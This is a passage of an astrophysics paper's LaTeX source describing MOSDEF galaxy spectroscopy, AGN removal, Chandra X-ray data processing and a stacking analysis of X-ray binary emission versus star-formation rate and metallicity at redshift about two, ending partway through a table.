The three redshift intervals were chosen to maximize coverage of strong rest-frame optical emission lines such that they fall within atmospheric transmission windows. Hereafter we will refer to these redshift intervals as $z\sim1.5$, $z\sim2.3$, and $z\sim3.4$, respectively, and collectively refer to the galaxies in the two lowest redshift intervals as the $z\sim2$ sample.
\subsection{MOSDEF Data Reduction}
The MOSFIRE spectra were reduced using a custom automated pipeline which performs flat-fielding, subtracts sky background, cleans cosmic rays, rectifies the frames, combines all individual exposures for a given source, and calibrates the flux (see \citealt{kriek15} for details).
Slit-loss corrections were determined by modeling the HST $H$-band light distribution of galaxies and calculating the amount of light passing through the slit, as detailed in \citet{kriek15} and \citet{reddy15}.
One-dimensional science and error spectra were optimally extracted based on the algorithm of \citet{horne86} (see the Appendix in \citealt{freeman19} for details). \par
\subsection{Emission lines fluxes and spectroscopic redshifts}
Emission-line fluxes were measured by fitting Gaussian line profiles on top of a linear continuum to the one-dimensional spectra (\citealt{kriek15}; \citealt{reddy15}). The H$\alpha$ and H$\beta$ emission line fluxes were corrected for Balmer absorption using best-fit SED models, as described in \citet{reddy18}. Flux uncertainties were estimated by performing 1,000 Monte Carlo realizations of the spectrum of each object perturbed by its error spectrum and refitting the line profiles; the average line fluxes and dispersions were measured from the resulting line flux distributions. Spectroscopic redshifts were measured using the centroids of the highest signal-to-noise ratio (S/N) emission lines, typically H$\alpha$ or [O{\small III}] $\lambda$5007. In total, the MOSDEF survey obtained spectroscopic redshifts for roughly 1300 objects, including galaxies that were specifically targeted and those that were serendipitously observed.
\subsection{SED-derived M$_*$ and SFR}
\label{sec:sed}
Stellar masses were estimated by modeling the available photometric data \citep{skelton14} for each galaxy with the spectral energy distribution (SED) fitting program FAST \citep{kriek09}, adopting the MOSDEF-measured spectroscopic redshift for each galaxy. The photometric data span rest-frame UV to near-IR wavelengths for $z\sim2$ galaxies. We used the stellar population synthesis models of \citet{conroy09}, assumed a \citet{chabrier03} IMF, adopted the \citet{calzetti00} dust attenuation curve, and parametrized star-formation histories using delayed exponentially declining models of the form SFR$(t) \propto te^{-t/\tau}$, where $t$ is the time since the onset of star formation and $\tau$ is the characteristic star formation timescale. For each galaxy, the best-fitting model was found through $\chi^2$ minimization, and confidence intervals for all free parameters were calculated from the distributions of 500 Monte Carlo simulations which perturbed the input photometric data points and repeated the SED fitting procedure.
Since our goal is to study the relationship between $L_{\mathrm{X}}$/SFR and $Z$, we explored the effect that SED-fitting assumptions can have on the derived SFR, particularly those assumptions that are $Z$-dependent (see \S\ref{sec:sfrindicator}). Therefore, we also used the results of SED fits from \citet{reddy18}, which use the \citet{bruzual03} (hereafter BC03) stellar population models and vary the assumed dust attenuation curve (\citealt{calzetti00} or SMC from \citealt{gordon03}) and the stellar metallicity ($Z=0.02$ or $Z=0.004$). These SED fits assume constant SF histories, which have been shown to be appropriate for typical ($L^*$) galaxies at $z\gtrsim1.5$ by previous studies \citep{reddy12}. Prior to SED-fitting, the photometry was corrected for the contribution from the strongest emission lines in the MOSFIRE spectra, including [O II], H$\beta$, [O III], and H$\alpha$.
\subsection{H$\alpha$ SFR}
\label{sec:hasfr}
SFRs were also derived from dust-corrected H$\alpha$ luminosities. H$\alpha$ SFRs are sensitive to SF on shorter timescales and subject to partly different systematics than SED-derived SFRs. H$\alpha$ luminosities were corrected for dust attenuation using the absorption-corrected Balmer decrement (H$\alpha$/H$\beta$) as described in \citet{reddy15} and \citet{shivaei15}. These corrections assume the \citet{cardelli89} extinction curve, which Reddy et al. (in prep) find is consistent with the nebular reddening curve of MOSDEF $z\sim2$ galaxies. The dust-corrected H$\alpha$ luminosities were converted into SFRs using the calibration of \citet{hao11} assuming a \citet{chabrier03} IMF (conversion factor of $4.634\times10^{-42} M_{\odot}$ yr$^{-1}$ erg$^{-1}$ s). H$\alpha$-derived SFRs are only calculated for galaxies in which both H$\alpha$ and H$\beta$ are detected with S/N $\geq3$. \par
Since this conversion factor depends on $Z$, \citet{reddy18} derive an alternative conversion factor that is more appropriate for the MOSDEF sample based on the BC03 $Z=0.004$ (0.28 $Z_{\odot}$) model. This conversion factor is $3.236\times10^{-42} M_{\odot}$ yr$^{-1}$ erg$^{-1}$ s. \par
For our default SFR measurements, we adopt H$\alpha$ SFRs with a $Z$-dependent correction, wherein for galaxies with 12+log(O/H)$>$8.3, we apply the H$\alpha$ luminosity conversion factor appropriate for $Z=0.02$ from \citet{hao11}, and for galaxies with lower O/H, we adopt the conversion factor for $Z=0.004$ from \citet{reddy18}. Although we think these SFR measurements are the most robust, nonetheless in \S\ref{sec:sfrindicator}, we discuss the impact that our choice of SFR indicator has on our results. \par
While the SED-derived SFRs may not fully account for dust-obscured star formation because they are based on fitting rest-frame UV to near-IR data, the H$\alpha$ SFRs are found to be in good agreement with UV+IR SFRs. \citet{shivaei16} compared the H$\alpha$ SFRs of 17 MOSDEF galaxies detected by \textit{Spitzer} MIPS and \textit{Herschel} with SED-derived SFRs based on the UV to far-IR bands, and found strong agreement with 0.17 dex of scatter but no systematic biases.
\subsection{Metallicity}
The gas-phase metallicity of a galaxy is derived from the fluxes of emission lines originating from gas in H{\small II} regions found near sites of recent star formation. Thus, the gas-phase oxygen abundance (O/H) is often used as a proxy for the stellar metallicity of the young stellar population of a galaxy, including its HMXBs. In order to facilitate the comparison of our results to the local $L_{\mathrm{X}}$-SFR-$Z$ relation, we adopt the same O/H indicator as \citet{brorby16}, namely O3N2 (log(([O{\small III}]$\lambda$5007/H$\beta$)/([N{\small II}]$\lambda$6584/H$\alpha$))). We use the calibration of \citet{pettini04}, which is based on a sample of H{\small II} regions most of which have direct electron temperature measurements. This calibration is:
\begin{equation}
12+\mathrm{log(O/H)} = 8.73 - 0.32 \times \mathrm{O3N2}
\end{equation}
We require that the four emission lines used for the O3N2 indicator are not significantly affected by nearby skylines or too close to the edge of the spectrum to measure the line flux reliably. If one or more of the emission lines required to calculate the O3N2 flux ratio was not detected with S/N $\geq3$, then a 3$\sigma$ upper limit on the line flux was computed and used to calculate an upper or lower limit on O/H.
\par
Even though we are using the same O/H indicator as \citet{brorby16}, it is possible that the O3N2 indicator evolves with redshift (\citealt{shapley15}; \citealt{sanders16a}) and that chemical abundances in galaxies at $z\sim2$ differ from the solar pattern (\citealt{steidel16}; \citealt{sanders19}), affecting the relationship between gas-phase O/H and stellar metallicity. We discuss the systematic effects on our results due to these effects in \S\ref{sec:systematics}.
\subsection{AGN Identification}
\label{sec:agn}
In order to study the X-ray binary (XRB) emission from MOSDEF galaxies, it is important to remove all known active galactic nuclei (AGN) from our sample. We identify AGN using diagnostics in multiple wavelength bands as detailed in \citet{coil15}, \citet{azadi17}, and \citet{leung17}. The AGN identification criteria are summarized below and the possible impact of AGN contamination is discussed in \S\ref{sec:systematics}.
\subsubsection{X-ray AGN}
All MOSDEF galaxies with \textit{Chandra} counterparts were classified as X-ray AGN. \citet{coil15} matched \textit{Chandra} sources detected by \texttt{wavdetect} with a false probability threshold $<4\times10^{-6}$ in at least one of four energy bands (0.5--7, 0.5--2, 2--7, and 4--7~keV) to likely multi-wavelength counterparts using the likelihood ratio method described in \citet{nandra15}; then the closest matches within 1$^{\prime\prime}$ to these counterparts were found in the 3D-HST catalogs used for MOSDEF target selection. The X-ray detected MOSDEF galaxies at $z>1.3$ have high rest-frame 2-10~keV luminosities of $L_{\mathrm{X}}>10^{41.5}$ erg s$^{-1}$ indicative of AGN emission.\footnote{In fact, all but one of the X-ray detected MOSDEF galaxies at $z>1.3$ have $L_{\mathrm{X}}>10^{42.5}$ erg s$^{-1}$.}
\par
\subsubsection{IR AGN}
Since X-ray photons are absorbed at very high column densities ($N_{\mathrm{H}}\gtrsim10^{24}$ cm$^{-2}$), X-ray surveys can miss the most heavily obscured AGN. In these obscured sources, the high-energy AGN emission is processed by dust and re-radiated at mid-infrared (MIR) wavelengths. This phenomenon makes it is possible to identify these obscured AGN based on their MIR colors. We select IR AGN using data from the Infrared Array Camera (IRAC; \citealt{fazio04}) on \textit{Spitzer} reported in the 3D-HST catalogs \citep{skelton14} and the IRAC color selection criteria defined by \citet{donley12}. \par
\subsubsection{Optical AGN}
Optical diagnostics such as the ``BPT diagram'' (\citealt{baldwin81}; \citealt{veilleux87}) can be used to identify AGN via their enhanced ratios of nebular emission lines [O{\small III}]$\lambda5008$/H$\beta$ and [N{\small II}]$\lambda6584$/H$\alpha$. However, since these diagnostics are based on the narrow components of emission lines, more detailed fitting of the H$\alpha$, H$\beta$, [O{\small III}], and [N{\small II}] emission lines is required to properly decompose the broad and narrow line components. As described in more detail in \citet{azadi17} and \citet{leung17}, the emission lines were fit with up to three Gaussian components: a narrow, a broad, and a blueshifted component representing outflows.
The broad and outflow components were only accepted if they resulted in an improved fit at $>99$\% confidence. Galaxies with significant broad lines were identified as optical AGN. \par
Using only the narrow line components, we placed galaxies on the BPT diagram. For this study, we flagged as an optical AGN any galaxy with log([N{\small II}]/H$\alpha$)$>-0.3$ and any galaxy falling above the \citet{kauffmann03} line in the BPT diagram. Not all galaxies above the \citet{kauffmann03} line are expected to be AGN, especially at $z\gtrsim2$ where galaxies are found to be offset to higher [N{\small II}]/H$\alpha$ values at fixed [O{\small III}]/H$\beta$ (\citealt{masters14}; \citealt{shapley15}; \citealt{sanders16a}; \citealt{strom17}). However, we choose to be conservative in our sample selection since even low-luminosity AGN emission may contaminate our measurements of X-ray luminosity, SFR, and O/H.
\section{\textit{Chandra} Extragalactic Surveys}
\label{sec:chandra}
The \textit{Chandra X-ray Observatory} has performed several deep extragalactic surveys. For this study, we use the \textit{Chandra} ACIS imaging in the \textit{Chandra} AEGIS-X Deep, Deep Field North (CDF-N), and Deep Field South (CDF-S) fields. These fields have the deepest X-ray exposures, permitting the most complete identification and removal of X-ray AGN. The exposure depths reached in these fields is 7~Ms in CDF-S, 2~Ms in CDF-N, and 800~ks in AEGIS-XD (\citealt{alexander03}; \citealt{nandra15}; \citealt{luo17}).
The corresponding flux limits (over $>50$\% of the survey area) in the 0.5--2~keV band reached by these surveys are $5\times10^{-17}$, $1.2\times10^{-16}$, and $2\times10^{-16}$~erg~cm$^{-2}$~s$^{-1}$, respectively, which correspond to 2--10~keV rest-frame X-ray luminosities of $1.2\times10^{42}$, $3.5\times10^{42}$, $5.8\times10^{42}$~erg~s$^{-1}$ at $z\sim2$ assuming a power-law spectrum with a photon index of $\Gamma=2.0$. \par
\subsection{\textit{Chandra} data processing}
The \textit{Chandra} data from the AEGIS-XD and CDF-N fields were processed as described in \citet{laird09}, \citet{rangel13}, \citet{nandra15}, and \citet{aird15}, and we made use of the publicly available \textit{Chandra} mosaic images and exposure maps of the CDF-S field produced as described in \citet{luo17}. The data were processed using the CIAO analysis software v4.1.2 and v4.8 for the former and latter data sets respectively. The data processing procedures applied to all three datasets are very similar and are briefly summarized below with full details provided in \citet{nandra15} and \citet{luo17}. \par
Each observation was cleaned and calibrated using standard CIAO algorithms. For each observation, the \textit{Chandra} wavelet source detection algorithm \texttt{wavdetect} was run on the 0.5--7~keV band image with a detection threshold of $10^{-6}$. The astrometry of individual observations was improved by using the CIAO tool \texttt{reproject\_aspect} to minimize the offsets between \texttt{wavdetect} sources and counterparts in the Canada-France-Hawaii Telescope Legacy survey (CFHTLS) $i$-band catalog \citep{gwyn12} for AEGIS-XD, the $r$-band Hawaii HDFN catalog \citet{capak04} for CDF-N, and the Taiwan ECDFS Near-Infrared Survey (TENIS) K$s$-band catalog \citep{hsieh12} for CDF-S.
\subsection{Chandra data products and catalogs}
For each individual observation, event files, images, exposure maps, and PSF maps of the 90\% encircled energy fraction (EEF) as calculated by the MARX simulator were created for the 0.5--7, 0.5--2, and 2--7~keV bands. The exposure maps provide the exposure multiplied by the effective collecting area at each pixel location; they are weighted for a power-law spectrum with $\Gamma=1.4$, the photon index of the cosmic X-ray background (\citealt{gruber99}; \citealt{ajello08}; \citealt{cappelluti17}).\footnote{Adopting a different value of $\Gamma$ in the range from 1.0 to 2.0 would change the exposure map values by $<10\%$.} The event files, images, exposure maps, and PSF maps for each field were merged together into the mosaics used in our X-ray stacking analysis (see \S\ref{sec:stacking}). \par
We compared the astrometric frame of these final mosaics to the astrometry of the 3D-HST catalogs from which the MOSDEF galaxy positions are determined. For each X-ray detected counterpart of a MOSDEF galaxy with $>40$ net counts in the $0.5-7$ keV band, we calculated the $(x,y)$ positional offset between its coordinates from the 3D-HST catalog and its centroid coordinates measured using the \texttt{gcntrd} IDL program. In the AEGIS, GOODS-S, and GOODS-N fields, there are 9, 6, and 23 such counterparts to MOSDEF galaxies. For each field, we then determined the average $x$ and $y$ offset, and found them to be $<1$ pixel in all cases. We apply these positional shifts to ensure the best match between the \textit{Chandra} mosaics and the astrometric reference frame of MOSDEF galaxies. However, we note that because the X-ray aperture regions used in our stacking analysis are at least 4 pixels in diameter, these small positional shifts do not significantly impact the derived X-ray properties of our stacks. \par
In order to study the XRB emission of non-AGN MOSDEF galaxies, it is important to reduce not only contamination from MOSDEF AGN but also the contribution from nearby detected X-ray sources that are not associated with MOSDEF galaxies. X-ray source catalogs for the CDF-S, CDF-N, and AEGIS-XD surveys are provided by \citet{luo17}, \citet{alexander03}, and \citet{nandra15}, respectively. We use these catalogs to remove the contribution of detected \textit{Chandra} sources to our X-ray stacks as detailed in \S\ref{sec:stacking}. \par
\section{Galaxy Sample Selection}
\label{sec:sample}
Since our goal is to study HMXB emission as a function of $Z$ and SFR, we apply several selection criteria to select galaxies with reliably measured properties and to minimize contamination from other X-ray sources. \par
Therefore, we excluded from our sample any MOSDEF galaxy that is identified as an AGN using the X-ray, IR, or optical criteria described in \S\ref{sec:agn}.
The other sources that can contribute significantly to a galaxy's hard X-ray emission are low-mass X-ray binaries (LMXBs), whose X-ray emission is correlated with the stellar mass ($M_*$) of a galaxy (\citealt{gilfanov04}; \citealt{colbert04}). Thus, the X-ray contribution of HMXBs relative to LMXBs is maximized in galaxies with high specific SFR (sSFR=SFR/$M_*$). Studies of local galaxies find that galaxies with sSFR$>10^{-10}$~yr$^{-1}$ are HMXB-dominated \citep{lehmer10}, which is true of all galaxies in our MOSDEF sample. However, the sSFR value at which galaxies transition from being LMXB-dominated to HMXB-dominated may increase with redshift (\citealt{lehmer16}). Considering that this value for $z\sim2$ galaxies remains poorly constrained, we study how restricting our sample to different sSFR ranges affects our results. Our MOSDEF galaxies span a sSFR range of $10^{-9.6}-10^{-8.1}$ yr$^{-1}$ with a median sSFR of $10^{-8.8}$ yr$^{-1}$. \par
We required that galaxies have an O/H measurement or upper/lower limit based on the O3N2 indicator in order to facilitate comparison to local studies of the $Z$ dependence of HMXBs (\citealt{douna15}; \citealt{brorby16}). In addition, we restricted our sample to galaxies with both H$\alpha$ and SED-derived SFRs.
We further limited our galaxy sample to $M_*\geq10^{9.5} M_{\odot}$, because \citet{shivaei15} demonstrated that MOSDEF samples may be incomplete at lower $M_*$ due to a bias against young objects with small Balmer and 4000 $\mathrm{\AA}$ breaks. Furthermore, the MOSDEF survey may not be complete in H$\alpha$ SFRs for $M_*<10^{9.5} M_{\odot}$, because we would expect that such low-mass galaxies scattering below the $M_*$-SFR relation \citep{sanders18} would fall below the $3\sigma$ H$\beta$ detection limit.
\par
As mentioned in \S\ref{sec:chandra}, even though the MOSDEF survey covers all the CANDELS fields, we only included galaxies from the GOODS-S \citep{giavalisco04}, GOODS-N \citep{giavalisco04}, and AEGIS \citep{davis07} fields; the \textit{Chandra} survey of the COSMOS field \citep{scoville07} is much shallower \citep{civano16}, and in the UKIDSS-UDS field \citep{lawrence07} only 34 galaxies were observed as a part of MOSDEF, just a few of which meet our selection criteria. Furthermore, only galaxies in the $z\sim1.5$ and $z\sim2.3$ redshift intervals are used. The galaxy sample at $z\sim3.4$ is too small to produce significant X-ray stacked detections and, at these high redshifts, the H$\alpha$ and [N{\small II}] emission lines move out of the near-infrared band, requiring different diagnostics to screen optical AGN and to measure $Z$ and SFR. \par
Finally, we imposed two additional restrictions in order to optimize the \textit{Chandra} stacking procedure described in \S\ref{sec:stacking}. These criteria are based on the size of the PSF at the galaxy position and proximity to other sources.\par
\begin{figure*}
\centering
\includegraphics[width=1.0\linewidth]{SFRvsM_Ha.ps}
\vspace{0.5in}
\caption{H$\alpha$ SFRs of MOSDEF galaxies versus $M_*$ derived from SED fitting. The gray squares show all MOSDEF galaxies with H$\alpha$-derived SFRs and no AGN signatures. The 79 galaxies used in our analysis are shown by symbols colored according to $Z$. The circle, lower half circle, and upper half circle symbols represent galaxies at 1.37 $\leq z \leq$ 1.70 with O/H measurements, upper limits, or lower limits, respectively. The diamond, downward triangle, and upward triangle symbols represent galaxies at 2.09 $\leq z \leq$ 2.61 with O/H measurements, upper limits, or lower limits, respectively. The median 1$\sigma$ uncertainty in SFR and $M_*$ measurements is shown in the upper left corner. The MOSDEF galaxies are well-distributed along the main sequence of star-forming galaxies shown by the gray contours, which are based on the distribution of galaxies with 1.37 $\leq z \leq$ 2.61 from the COSMOS field \citep{laigle16}. The vertical dashed line represents our $M_*$ selection threshold, while the diagonal dashed line represents our division of the sample into high and low sSFR galaxies (sSFR$=10^{-8.8}$ yr$^{-1}$).}
\label{fig:sfrmass}
\end{figure*}
Only 79 MOSDEF galaxies meet all our selection criteria. Figure \ref{fig:sfrmass} displays the H$\alpha$ SFR versus stellar mass for the galaxies in our sample in points colored by the oxygen abundance and outlined in blue or black for $z\sim1.5$ and $z\sim2.3$, respectively. The gray dots in this figure represent all MOSDEF galaxies with $1.4<z<2.7$ and H$\alpha$-derived SFRs, and the gray contours are based on the SED-derived SFRs and $M_*$ from a much larger sample of $\sim$160,000 galaxies in the COSMOS field with photometric redshifts in the same $z$ range \citep{laigle16}. As can be seen, even though our sample is small, it is representative of star-forming galaxies at $z\sim2$. \citet{sanders18} found evidence that a $M_*$-SFR-$Z$ relation exists in MOSDEF galaxies at $z\sim2.3$, a hint of which can be observed in Figure \ref{fig:sfrmass} as galaxies with higher SFR at fixed $M_*$ have lower $Z$. As shown in Figure \ref{fig:redshift}, 20 galaxies are at $z\sim1.5$ and 59 are at $z\sim2.3$. The $Z$ distribution of our sample is shown in Figure \ref{fig:metaldist}, with 12+log(O/H) measurements, 3$\sigma$ upper, and 3$\sigma$ lower limits indicated in different colors. The $Z$ distribution is strongly peaked at 12+log(O/H) = 8.3-8.4.
\begin{figure}
\centering
\includegraphics[width=1.0\linewidth]{zhistogram.ps}
\caption{The redshift distribution of the 79 galaxies used for our study. The distribution is bimodal because MOSDEF targets were selected in specific redshift windows ($1.37\leq z\leq1.70$ and $2.09\leq z\leq2.61$) for which rest-frame optical strong emission lines fall within atmospheric transmission windows. There are more galaxies with $z\sim2.3$ than $z\sim1.5$ as a result of the MOSDEF survey's targeting strategy \citep{kriek15}.}
\label{fig:redshift}
\end{figure}
\begin{figure}
\centering
\includegraphics[width=1.0\linewidth]{Zmetal_histogram.ps}
\caption{The distribution of $Z$ of the galaxies in our sample, as traced by nebular O/H based on the O3N2 indicator. O/H measurements (calculated when all relevant emission lines are significantly detected) are shown in purple, while O/H upper and lower limits are shown in blue and red, respectively.}
\label{fig:metaldist}
\end{figure}
\section{X-ray Stacking Analysis}
\label{sec:stacking}
The typical X-ray luminosities of normal (non-AGN) star-forming galaxies are $L_X<10^{42}$~erg~s$^{-1}$ in the rest-frame 2--10~keV band.\footnote{Low luminosity AGN and/or obscured AGN can also exhibit $L_X<10^{42}$~erg~s$^{-1}$. We discuss possible contamination from such AGN in \S\ref{sec:systematics}.} Since these luminosities fall below the sensitivity limits of the \textit{Chandra} extragalactic surveys at $z\sim2$, studying the X-ray emission of these galaxies requires stacking the X-ray data. We developed an X-ray stacking technique that is similar to that used by other studies (e.g. \citealt{basu13a}; \citealt{rangel13}; \citealt{mezcua16}; \citealt{fornasini18}). In order to achieve the highest sensitivity, we performed the stacking primarily using the 0.5--2~keV band because \textit{Chandra} has the highest effective area and best angular resolution at soft X-ray energies. However, we also stacked the data in the 2-7~keV band in order to measure the hardness ratios for our stacks. \par
\subsection{X-ray photometry for individual sources}
For each of the galaxies in our sample, we defined source and background aperture regions. Each source aperture was defined as a circular region centered on the galaxy position from the 3D-HST catalog with a radius equal to the 90\% ECF PSF radius ($r_{90}$). The median $r_{90}$ of MOSDEF objects is $2.4^{\prime\prime}$, and their angular sizes are small enough that their galaxy-wide X-ray emission is consistent with a point source. Each background aperture was defined as an annulus with an inner radius equal to 10$^{\prime\prime}$ and an outer radius equal to 30$^{\prime\prime}$. \par
As mentioned in \ref{sec:sample}, we made some refinements to our galaxy sample based on X-ray criteria.
In order to prevent contamination to our source or background count estimates from unassociated X-ray sources, we masked out from the images and exposure maps circular regions with a radius of 2$r_{90}$ at the positions of any X-ray detected sources in the CDF-S, CDF-N, and AEGIS-XD source catalogs (\citealt{alexander03}; \citealt{luo17}; \citealt{nandra15}), regardless of what energy band the source was detected in. We removed from our sample any galaxy at a distance $<2r_{90}$ of an X-ray detected source. We also excluded any galaxies at a distance $<r_{90}$ from another galaxy in the 3D-HST catalog with $H_{\mathrm{AB}}$ (F160W) magnitude $<24.0$, which is the magnitude limit approximately corresponding to $M_*=10^{9.5} M_{\odot}$ at $z\sim2.3$. These sources were excluded to avoid contamination from neighboring galaxies with X-ray emission below the sensitivity threshold of the \textit{Chandra} surveys but potentially of comparable or greater luminosity as our MOSDEF galaxies. We also removed four galaxies located in an area of diffuse X-ray emission in the CDF-N field. Finally, to optimize the signal-to-noise ratio, we excluded galaxies located far off-axis in the \textit{Chandra} observations as the \textit{Chandra} PSF increases with off-axis angle; we find that the significance of our stacks is maximized by excluding sources with $r_{90}>3.5^{\prime\prime}$. \par
We extracted the counts ($C_{\mathrm{src}}$, $C_{\mathrm{bkg}}$), effective exposure time ($t_{\mathrm{src}}$, $t_{\mathrm{bkg}}$), and apertures areas in units of pixels$^2$ ($A_{\mathrm{src}}$, $A_{\mathrm{bkg}}$) for both the source and background regions for each galaxy using the CIAO tool \texttt{dmextract}. The effective exposure accounts for variations across the field of view due to the telescope optics, CCD gaps, and bad pixels. The background region counts were extracted from the annular background regions, from which any X-ray detected sources as well as all MOSDEF galaxies were masked out. Our measurements of the aperture areas account for any fraction of the area that was masked out. \par
For each source, we calculated the net background-subtracted counts and a conversion factor to translate the net counts into the rest-frame X-ray luminosity. The net source counts ($C_{\mathrm{net}}$) are calculated as:
\begin{equation}
C_{\mathrm{net}} = C_{\mathrm{src}} - C_{\mathrm{bkg}}\times\frac{t_{\mathrm{src}}A_{\mathrm{src}}}{t_{\mathrm{bkg}}A_{\mathrm{bkg}}}
\end{equation}
Converting the net counts in the 0.5--2~keV band into rest-frame 2--10~keV luminosities requires assuming a spectral model to calculate the mean energy per photon ($E_{\mathrm{avg}}$) and the $k$-correction ($k_{\mathrm{corr}}$). We assume an unobscured power-law spectrum with $\Gamma=2.0$ to facilitate comparison with the local $L_{\mathrm{X}}$-SFR-$Z$ relation measured by \citet{brorby16}. In Section \ref{sec:systematics}, we discuss the validity and uncertainty associated with this assumption. For each source, we calculate the conversion factor, $\omega$, between net counts and X-ray luminosity, as given by:
\begin{equation}
\begin{split}
L_{\mathrm{X}} & = C_{\mathrm{net}}/\omega \\
\omega & = (t_{\mathrm{src}}\mathrm{ECF})/(4\pi D_{\mathrm{L}}^{2} E_{\mathrm{avg}} k_{\mathrm{corr}})
\end{split}
\end{equation}
where $D_{\mathrm{L}}$ is the luminosity distance and ECF $=0.9$ since our aperture regions are based on 90\% PSF radius. \par
\subsection{Stacked X-ray luminosities}
For a given galaxy stack, we summed the net counts and the expected number of background counts from individual source apertures. The average X-ray luminosity ($\langle L_{\mathrm{X}} \rangle$) of a stack of $N$ galaxies is calculated as the total net counts divided by the sum of the conversion factors:
\begin{equation}
\langle L_{\mathrm{X}} \rangle = \frac{1}{N}\sum_i^N \frac{C_{\mathrm{net,}i}}{\omega_{i}} \approx \frac{\sum_i^N C_{\mathrm{net,}i}}{\sum_i^N \omega_{i}}
\end{equation}
This approximation is appropriate when the galaxies in a given stack have similar $L_X$. We expect the range of $L_X$ for galaxies in a given $Z$ bin to primarily be set by the range of SFR, and therefore to span at most 2 orders of magnitude. For such a range of $L_X$, we estimate that the approximation we use to measure $\langle L_{\mathrm{X}} \rangle$ should be accurate to 0.1 dex. The conversion factor $\omega$ associated with each galaxy provides a relative weighting for how much each galaxy contributes to the measured X-ray emission. Since our goal is to study the relationship between $L_{\mathrm{X}}$ and different galaxy properties (i.e. SFR, $Z$, $z$, $M_*$, sSFR), for each galaxy stack we also calculate the weighted average of each galaxy property, applying the $\omega$ factors used to calculate the X-ray luminosity. We estimate that our measurement of $\langle L_{\mathrm{X}} \rangle/\langle $SFR$ \rangle$ should approximate $\langle L_{\mathrm{X}}/$SFR$ \rangle$ with an accuracy of 0.05 dex based on the scatter of 0.3-0.4 dex observed in the local $L_X$-SFR-$Z$ relation \citep{brorby16}. \par
We computed two sources of error on each stacked signal. The first is Poisson noise associated with the background, which we used to establish the significance of the signal in each stack. We calculated the Poisson probability that a random fluctuation of the estimated background counts could result in a number of counts within the source regions greater than or equal to the total stacked counts (source plus background). \par
Table \ref{tab:prop} provides information about the properties of galaxies in our stacks, including the weighted average redshift, $M_*$, and SFR, as well as the median stacked O/H. The X-ray properties of our stacks, including the signal significance, net counts, and mean $L_{\mathrm{X}}$, are presented in Table \ref{tab:xray}.
We tested that our stacking procedure does not result in an unusual number of spurious detections by stacking the \textit{Chandra} data at random sky positions rather than galaxy positions. We apply the same X-ray selection criteria to the random positions as our galaxy sample.
We make 500 mock stacks for each of the 10 real stacks described in Table \ref{tab:prop}; each mock stack includes the same number of individual positions per \textit{Chandra} survey field as its corresponding real stack. For each mock stack, we calculate the probability that the total stacked counts could be due to a random fluctuation of the estimated background. The resulting probability distributions of the mock stacks is consistent with expectations for random noise (e.g. $1\%$ of mock stacks have a 1\% probability of being due to random noise). Thus, the detection probabilities of our real stacks are reliable.
\par
The statistical uncertainties associated with the measured X-ray luminosities are calculated using a bootstrapping method, which measures how the contribution of individual sources affects the average stacked signal. To determine the bootstrapping errors, we randomly resampled the galaxies in each stack 1000 times and repeated our stacking analysis. The number of galaxies in a given stack is conserved during the resampling, leading some values to be duplicated while others are eliminated in a particular iteration. From the resulting distribution of stacked X-ray luminosities, we measure 1$\sigma$ confidence intervals for stacked signals exceeding our detection threshold.
\par
As done in \citet{lehmer16}, the uncertainties associated with the weighted average galaxy properties ($\langle Q_{\mathrm{phys}} \rangle$) are also calculated by a bootstrapping technique. Each galaxy value is perturbed according to its error distribution and the weighted average is recalculated. The calculation of these perturbed average values ($\langle Q^{\mathrm{pert}}_{\mathrm{phys,}k} \rangle$) is performed 1000 times and the 1$\sigma$ uncertainty on the weighted average is according to the following equation:
\begin{equation}
\sigma_{\langle Q_{\mathrm{phys}} \rangle} = \frac{1}{N_{\mathrm{boot}}}\Big[\sum_{\mathrm{k}=0}^{N_{\mathrm{boot}}}(\langle Q^{\mathrm{pert}}_{\mathrm{phys,}k} \rangle - \langle Q_{\mathrm{phys}} \rangle )^2 \Big]^{1/2}
\end{equation}
\par
The weighted average galaxy properties for each stack discussed in \S\ref{sec:results} are provided in Table \ref{tab:prop}, while the stacked X-ray properties are listed in Table \ref{tab:xray}.
\begin{table*}
\begin{minipage}{\textwidth}
\centering
\footnotesize
\caption{Average Galaxy Properties of Stacks}
\begin{tabular}{cccccccclcc} \hline \hline
\T \multirow{2}{*}{Stack ID} & \multicolumn{4}{c}{\# Galaxies} & \multirow{2}{*}{$\langle z \rangle$} & log$\langle M_* \rangle$ & \multirow{2}{*}{12+log(O/H)} & \hspace{0.3cm}SFR & $\langle \mathrm{SFR}\rangle$ & log$\langle \mathrm{sSFR} \rangle$ \\ \cline{2-5}
& All & AEGIS & CDF-N & CDF-S & & ($M_{\odot}$) & & Indicator & ($M_{\odot}$ yr$^{-1}$) & (yr$^{-1}$) \\
\B (a) & (b) & (c) & (d) & (e) & (f) & (g) & (h) & (i) & (j) & (k) \\
\hline
\multicolumn{5}{l}{\textbf{All sSFR}} \\
\hline
\T \B 1 & 79 & 53 & 22 & 3 & 1.92 & $10.121^{+0.002}_{-0.001}$ & $8.31\pm0.01$ & H$\alpha$, corr & $22.9^{+0.7}_{-0.3}$ & $-8.738^{+0.009}_{-0.004}$\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: redshift binning}} \\
\hline
\T 2 & 20 & 13 & 7 & 0 & 1.51 & $10.053^{+0.002}_{-0.001}$ & $8.32\pm0.02$ & H$\alpha$, corr & $16.6^{+0.5}_{-0.2}$ & $-8.856^{+0.010}_{-0.004}$\\
\B 3 & 59 & 41 & 15 & 3 & 2.26 & $10.172\pm0.001$ & $8.31\pm0.01$ & H$\alpha$, corr & $28.3^{+0.9}_{-0.4}$ & $-8.658^{+0.009}_{-0.004}$\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: metallicity binning}} \\
\hline
\T 4 & 30 & 19 & 8 & 3 & 2.05 & $9.971^{+0.002}_{-0.001}$ & $8.23^{+0.01}_{-0.02}$ & H$\alpha$, corr & $22.6^{+0.7}_{-0.3}$ & $-8.606^{+0.006}_{-0.003}$ \\
5 & 23 & 19 & 4 & 0 & 1.82 & $10.110^{+0.002}_{-0.001}$ & $8.35\pm0.01$ & H$\alpha$, corr & $27.3^{+0.8}_{-0.3}$ & $-8.711^{+0.013}_{-0.005}$ \\
\B 6 & 19 & 13 & 6 & 0 & 1.78 & $10.337\pm0.002$ & $8.52\pm0.02$ & H$\alpha$, corr & $25.4^{+0.9}_{-0.3}$ & $-8.983^{+0.014}_{-0.005}$ \\
\hline
\multicolumn{5}{l}{\textbf{Restricting sSFR: metallicity binning}} \\
\hline
